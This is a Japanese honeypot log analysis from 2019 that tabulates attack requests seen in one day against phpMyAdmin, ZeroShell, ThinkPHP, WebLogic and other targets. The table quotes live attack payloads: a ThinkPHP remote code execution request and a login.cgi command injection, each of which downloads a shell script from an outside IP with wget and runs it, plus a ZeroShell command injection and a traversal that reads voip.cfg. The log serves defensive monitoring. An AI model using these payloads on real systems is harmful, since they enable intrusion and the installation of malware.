BW-Potのログ分析 (2019/03/27)
脆弱性を狙った通信が多い?一日でした。
組込みシステムによく用いられるOS、ZeroShellに対する攻撃が記録されました。
typeパラメータを通して任意のコマンドを実行できるようです。
/var/tmp/voip.cfgを見ていることからIP電話などに対する攻撃でしょうか?
また、ThinkPHPに関する攻撃によって落ちてくるファイル(a_thk.sh)は取得できたので、そのうち分析しようと思います。
別の攻撃によって落ちてくるizuku.shは、取得できませんでした。
また、phpMyAdminへの攻撃と思われる通信のrequest_bodyに以下のような珍しいタイプのものが見られました。
末尾にtokenを持たせています。
pma_username=root&pma_password=~!@&server=1&target=index.php&token=#<jtb'|${!/.O,{X
| 件数 | 種別 | リクエスト |
| 362 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 252 | phpMyAdminに関する攻撃 | POST /phpmyadmin/index.php |
| 60 | アクセス | GET / |
| 3 | 不正中継の調査 | GET api.binance[.]com/api/v1/time |
| 3 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 2 | アクセス | HEAD / |
| 2 | Kubernetesに関する調査 | GET /api/v1 |
| 2 | phpMyAdminに関する調査 | GET /phpmyadmin/scripts/setup.php |
| 2 | クローリング | HEAD /robots.txt |
| 2 | phpMyAdminに関する調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
| 1 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |
| 1 | ディレクトリトラバーサル攻撃 | GET //cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20allcfgconv%20-C%20voip%20-c%20-o%20-%20../../../../../var/tmp/voip.cfg%20%26 |
| 1 | Kubernetesに関する調査 | GET /api/v1/pods |
| 1 | 不明 | GET /bea_wls_internal/ponies.txt |
| 1 | ZeroShellに対する攻撃 | GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22%26id%26%22 |
| 1 | アクセス | GET /favicon.ico |
| 1 | 不明 | GET /index.php |
| 1 | ThinkPHPに関する攻撃 | GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20hxxp://82.212.70[.]218/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; |
| 1 | 不明 | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ |
| 1 | phpMyAdminに関する調査 | GET /phpmyadmin/index.php |
| 1 | クローリング | GET /robots.txt |
| 1 | サイトの構成調査 | GET /sitemap.xml |
| 1 | WebLogic の脆弱性(CVE-2017-10271)を狙った攻撃 | GET /wls-wsat/CoordinatorPortType |
| 1 | WebLogic の脆弱性(CVE-2017-10271)を狙った攻撃 | POST /wls-wsat/CoordinatorPortType |
